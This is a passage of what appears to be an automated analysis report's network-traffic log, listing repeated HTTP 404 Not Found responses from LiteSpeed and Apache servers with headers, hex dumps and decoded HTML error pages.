75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 08 Oct 2024 13:54:07 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 08 Oct 2024 13:54:10 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 08 Oct 2024 13:54:12 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:54:31 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:54:34 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:54:37 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:54:39 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:54:45 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:54:47 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:54:50 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:54:53 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
